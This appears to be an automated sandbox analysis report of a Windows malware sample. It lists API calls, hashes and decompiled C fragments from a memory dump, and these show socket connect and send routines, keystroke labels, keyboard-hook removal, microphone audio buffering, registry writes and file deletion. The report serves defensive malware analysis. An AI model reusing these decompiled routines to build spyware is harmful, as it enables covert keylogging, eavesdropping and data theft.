                                          • Opcode ID: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                                          • Instruction ID: dac1581c1d28e517801eb3be04acf8c600069e7031f390e60f55bb430ac4377d
                                          • Opcode Fuzzy Hash: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                                          • Instruction Fuzzy Hash: B2F0C97140461AAFCB14DFA4DC8C9DAB7FCFE5820870008A9A183D3510EA75F64ACB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 004025F9
                                          • connect.WS2_32(00000000,00415278,00000010), ref: 00402608
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000006,?,?,00408D8C), ref: 0040261B
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • closesocket.WS2_32(00000000), ref: 00402630
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00415278,00000010,00000000,00000001,00000006,?,?,00408D8C), ref: 0040263B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@V01@@$??4?$basic_string@?data@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@closesocketconnectsendsocket
                                          • String ID:
                                          • API String ID: 2015417588-0
                                          • Opcode ID: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                                          • Instruction ID: 3ac3c1af87fc4ba09d50238af9d46122a468a8ea4431591f33cc56d3a1d2174b
                                          • Opcode Fuzzy Hash: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                                          • Instruction Fuzzy Hash: 42F0A73164111537D62076759D0ABDB3A188B12795F00017AFD05B61C1EAF9894482DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040E4FD
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040E511
                                          • ?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411844,73115DF0), ref: 0040E526
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040E535
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E53E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@D@1@@FileModuleNameV12@
                                          • String ID:
                                          • API String ID: 2641972318-0
                                          • Opcode ID: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                                          • Instruction ID: 1e1a59f65a474f258a2f266179515592e576b6157cd272470b44933d2ea38500
                                          • Opcode Fuzzy Hash: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                                          • Instruction Fuzzy Hash: 83F0D07150010FEFDF44DF94ED4AFED7B78EB04309F108061B605A61A0DAB0AA89CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E0040520C(CHAR* __eax, void* __ecx) {
                                          				CHAR* _t5;
                                          				signed int _t8;
                                          				signed int _t9;
                                          				void* _t15;
                                          
                                          				_t15 = __ecx;
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t5 = DeleteFileA(__eax);
                                          				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                          				__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t15 + 0x60, 0x410668);
                                          				if(_t5 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					RemoveDirectoryA(_t5);
                                          				}
                                          				return _t9;
                                          			}

                                          Instruction addresses: 0x0040520e, 0x00405213, 0x0040521a, 0x00405222, 0x0040522e, 0x00405238, 0x0040523c, 0x00405243, 0x00405243, 0x0040524d

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004156C0,74B5FBA0,00405285), ref: 00405213
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040521A
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415660,00410668), ref: 0040522E
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040523C
                                          • RemoveDirectoryA.KERNEL32(00000000), ref: 00405243
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@$??9std@@D@2@@0@DeleteDirectoryFileRemoveV?$basic_string@
                                          • String ID:
                                          • API String ID: 485653077-0
                                          • Opcode ID: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                                          • Instruction ID: 49b04f277348f71567298f07d152f4b3d3d547bd3422a61795910190b4fb5562
                                          • Opcode Fuzzy Hash: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                                          • Instruction Fuzzy Hash: C3E086762416219BCA041BF0AC0C9CB371CAE45212300417BF402E36A0CFF98CC48B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036C7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036E2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036EB
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                          • String ID:
                                          • API String ID: 2599707790-0
                                          • Opcode ID: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                                          • Instruction ID: ce469ae2fa8136e1a9f0fe53df6847e3631b9c5038cfbca0e221b482f1c808aa
                                          • Opcode Fuzzy Hash: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                                          • Instruction Fuzzy Hash: A8E00A31210557CBC7249F30EA5C4E5B764BA91619300447A9157515B0DFB4AD49CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040908B(void* _a4, void* _a8, char _a12, char _a16) {
                                          				long _t14;
                                          
                                          				if(RegCreateKeyA(_a4, _a8,  &_a8) != 0) {
                                          					return 0;
                                          				} else {
                                          					_t5 =  &_a12; // 0x415268
                                          					_t14 = RegSetValueExA(_a8,  *_t5, 0, 0xb,  &_a16, 8);
                                          					return RegCloseKey(_a8) & 0xffffff00 | _t14 == 0x00000000;
                                          				}
                                          			}

                                          Instruction addresses: 0x004090a0, 0x004090cf, 0x004090a2, 0x004090ad, 0x004090b3, 0x004090cb, 0x004090cb

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(00409B23,?,?), ref: 00409098
                                          • RegSetValueExA.ADVAPI32(?,hRA,00000000,0000000B,?,00000008,00415268,?,00409B23,00000000), ref: 004090B3
                                          • RegCloseKey.ADVAPI32(?,?,00409B23,00000000), ref: 004090BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: hRA
                                          • API String ID: 1818849710-819137882
                                          • Opcode ID: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                                          • Instruction ID: 45296832074a86694a0120e67756151a47aa0ea66b010438851f7b77956f428d
                                          • Opcode Fuzzy Hash: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                                          • Instruction Fuzzy Hash: A4E0C932540218BBDF115F90FD05FDA3B6DEB08761F00C021FE199A161D771DA609B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 00403605
                                          • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00403612
                                          • _CxxThrowException.MSVCRT(?,004119F0), ref: 00403621
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          Strings
                                          • invalid vector<T> subscript, xrefs: 00403600
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                                          • String ID: invalid vector<T> subscript
                                          • API String ID: 2273067808-3016609489
                                          • Opcode ID: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                                          • Instruction ID: d1dc714aa17fc7b7442ac04cbb7cbb2b6be57595b17b16616ed7d09586dc421c
                                          • Opcode Fuzzy Hash: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                                          • Instruction Fuzzy Hash: F3E0487185420F7BDF04FBE1DD4ADEEB77DFA14305B504036F904A20A0EA756A4ACB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012DA
                                          • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012E7
                                          • _CxxThrowException.MSVCRT(?,004119F0), ref: 004012F6
                                            • Part of subcall function 00401305: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 00401312
                                          Strings
                                          • invalid vector<T> subscript, xrefs: 004012D5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@D@1@@D@2@@std@@$??0out_of_range@std@@D@2@@1@@ExceptionThrowV?$basic_string@
                                          • String ID: invalid vector<T> subscript
                                          • API String ID: 4148323614-3016609489
                                          • Opcode ID: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                                          • Instruction ID: 885d5109308db86c39cf624aab1bba59d6d0b6b2a3733cbd4a3c7a04b8bfaa9f
                                          • Opcode Fuzzy Hash: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                                          • Instruction Fuzzy Hash: 53E0127181410FAADB04F7E5D94ADED777CB9043057600036BD02B24E1DAB855498B2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040E4C4() {
                                          				_Unknown_base(*)()* _t2;
                                          
                                          				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                          				 *0x415b78 = _t2;
                                          				return _t2;
                                          			}

                                          Instruction addresses: 0x0040e4da, 0x0040e4e0, 0x0040e4e5

                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040E4D3
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040E4DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                                          • Instruction ID: c49a19daebca9e066ce9d428bbfec3a7347074465f3c8db43cf9aeb53f5350e0
                                          • Opcode Fuzzy Hash: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                                          • Instruction Fuzzy Hash: 6CC092B49A0600BFC7012FB2ED0DAD83AA4A684702724C436B20AE21B4CBBD50C1DA6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040F89D() {
                                          				_Unknown_base(*)()* _t2;
                                          
                                          				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                          				 *0x415ba8 = _t2;
                                          				return _t2;
                                          			}

                                          Instruction addresses: 0x0040f8b3, 0x0040f8b9, 0x0040f8be

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040F8AC
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040F8B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetConsoleWindow$kernel32.dll
                                          • API String ID: 2574300362-100875112
                                          • Opcode ID: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                                          • Instruction ID: 827c4046bcd6e5c73998b2cbf4f49e030bf6490dcf6eebc42fb88a3b65635bfa
                                          • Opcode Fuzzy Hash: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                                          • Instruction Fuzzy Hash: 69C092B5980200BFD7106FA1EC4DED93AB4AA48742720C136F60AE19B4CBBD10C19A1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0040147C(void* __eflags, signed int _a4) {
                                          				intOrPtr _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t22;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				intOrPtr _t32;
                                          				intOrPtr _t33;
                                          				signed int _t36;
                                          
                                          				_t38 = __eflags;
                                          				E00401289(0x4151c0, __eflags, _a4);
                                          				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x415194);
                                          				_t36 = _a4 << 5;
                                          				_t16 = E00401289(0x4151c0, _t38, _a4);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t28 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                          				_t17 =  *0x41519c; // 0x30828e8
                                          				_t29 =  *0x415194; // 0x0
                                          				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                          				_t30 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                          				_t31 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                          				_t32 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                          				_t33 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                          				_t19 =  *0x41519c; // 0x30828e8
                                          				waveInPrepareHeader( *0x415158, _t19 + _t36, 0x20);
                                          				_t22 =  *0x41519c; // 0x30828e8
                                          				return waveInAddBuffer( *0x415158, _t36 + _t22, 0x20);
                                          			}

                                          Instruction addresses: 0x0040147c, 0x00401491, 0x00401498, 0x004014a6, 0x004014a9, 0x004014b0, 0x004014b6, 0x004014be, 0x004014c1, 0x004014c6, 0x004014cc, 0x004014d0, 0x004014d8, 0x004014dc, 0x004014e2, 0x004014e6, 0x004014ec, 0x004014f0, 0x004014f6, 0x004014fa, 0x00401508, 0x0040150e, 0x00401527

                                          APIs
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,00415268,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401498
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 004014B0
                                          • waveInPrepareHeader.WINMM(030828E8,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401508
                                          • waveInAddBuffer.WINMM(?,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 0040151E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                          • String ID:
                                          • API String ID: 1952094867-0
                                          • Opcode ID: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                                          • Instruction ID: 607d35f18d4bb3c038525a4507ad7304f57bd8fd619bab3b66f3d3b81191445e
                                          • Opcode Fuzzy Hash: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                                          • Instruction Fuzzy Hash: BD110D35A10A00FFCB168F55EC58BEA7BA5EBC9318700C47EEA4EC7365D671A841CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404336(struct HHOOK__** __ecx) {
                                          				struct HHOOK__* _t11;
                                          				struct HHOOK__** _t17;
                                          
                                          				_t17 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x39)) == 0) {
                                          					L6:
                                          					return 0;
                                          				}
                                          				_t2 =  &(_t17[0xa]); // 0x0
                                          				if(TerminateThread( *_t2, 0) != 1) {
                                          					goto L6;
                                          				}
                                          				_t3 =  &(_t17[0xc]); // 0x0
                                          				_t17[0xe] = 0;
                                          				_t17[0xa] = 0;
                                          				CloseHandle( *_t3);
                                          				if(_t17[0xe] == 0) {
                                          					_t11 =  *_t17;
                                          					if(_t11 != 0) {
                                          						UnhookWindowsHookEx(_t11);
                                          						 *_t17 = 0;
                                          						TerminateThread(E0040380C, 0);
                                          					}
                                          				}
                                          				return 1;
                                          			}

                                          Instruction addresses: 0x00404338, 0x00404340, 0x00404382, 0x00000000, 0x00404382, 0x00404349, 0x00404351, 0x00000000, 0x00000000, 0x00404353, 0x00404356, 0x00404359, 0x0040435c, 0x00404365, 0x00404367, 0x0040436b, 0x0040436e, 0x0040437a, 0x0040437c, 0x0040437c, 0x0040436b, 0x00000000

                                          APIs
                                          • TerminateThread.KERNEL32(00000000,00000000,00415A30,00415940,00415268,0040A63B,0040A71E,00000001), ref: 0040434C
                                          • CloseHandle.KERNEL32(00000000), ref: 0040435C
                                          • UnhookWindowsHookEx.USER32(00000000), ref: 0040436E
                                          • TerminateThread.KERNEL32(0040380C,00000000), ref: 0040437C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: TerminateThread$CloseHandleHookUnhookWindows
                                          • String ID:
                                          • API String ID: 952708117-0
                                          • Opcode ID: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                                          • Instruction ID: b3774055a663eb231de0d977992da6d56e6fa1a05363ce64aae77dfed93c93a6
                                          • Opcode Fuzzy Hash: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                                          • Instruction Fuzzy Hash: 2BF0E9B22003446FD7715F644CC089BBB9DBA95360350287FEAC293A11C275EC819718
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                          • SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                          • String ID:
                                          • API String ID: 3911305588-0
                                          • Opcode ID: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                                          • Instruction ID: 0779d908e9be27da86272a0c0adb87f85a3e9ee435f515b886d5906f097178b3
                                          • Opcode Fuzzy Hash: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                                          • Instruction Fuzzy Hash: CEF08231000749EFCB11CFA0D94CED67FA9AF05345F444469E58742961DB74F988CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040ED0C(HANDLE* _a4) {
                                          				void* _t2;
                                          				void* _t3;
                                          
                                          				_t2 = GetCurrentProcess();
                                          				_t3 = GetCurrentThread();
                                          				return DuplicateHandle(GetCurrentProcess(), _t3, _t2, _a4, 0, 1, 2);
                                          			}

                                          Instruction addresses: 0x0040ed1f, 0x0040ed22, 0x0040ed34

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,7313CB00,?,0040C570,?), ref: 0040ED1F
                                          • GetCurrentThread.KERNEL32 ref: 0040ED22
                                          • GetCurrentProcess.KERNEL32(00000000,?,0040C570,?), ref: 0040ED29
                                          • DuplicateHandle.KERNEL32(00000000,?,0040C570,?), ref: 0040ED2C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                                          • Instruction ID: a27c7ae999809b9e73f37912e12988bcc4cb6827362b4042a6689fcf131767f6
                                          • Opcode Fuzzy Hash: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                                          • Instruction Fuzzy Hash: 58D09E7194021C77D91027B5AC0EFC63E1CDB05761F008421B608A6091C6F654818BE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 004050A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID: [LCtrl] $ [RCtrl]
                                          • API String ID: 4257247948-618823999
                                          • Opcode ID: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                                          • Instruction ID: 69a1fac85d8d50c9318be5c9ee5530278cac5bde9cdc7065c5d4e5bcd0292750
                                          • Opcode Fuzzy Hash: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                                          • Instruction Fuzzy Hash: 69E09B317006047FDA14A65DC81BEBF76ACDB40754F400167F901E72C0D9F95D4086DB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040F0B5(void* __ecx) {
                                          				char _v8;
                                          				void* _t7;
                                          
                                          				if( *0x415b94 == 0) {
                                          					L2:
                                          					return 0;
                                          				}
                                          				_t1 =  &_v8; // 0x4075ea
                                          				 *0x415b94(GetCurrentProcess(), _t1);
                                          				_t7 = 1;
                                          				if(_v8 != _t7) {
                                          					goto L2;
                                          				}
                                          				return _t7;
                                          			}

                                          Instruction addresses: 0x0040f0c0, 0x0040f0db, 0x00000000, 0x0040f0db, 0x0040f0c2, 0x0040f0cd, 0x0040f0d5, 0x0040f0d9, 0x00000000, 0x00000000, 0x0040f0de

                                          APIs
                                          • GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                          • IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
                                          Strings
                                          Memory Dump Source
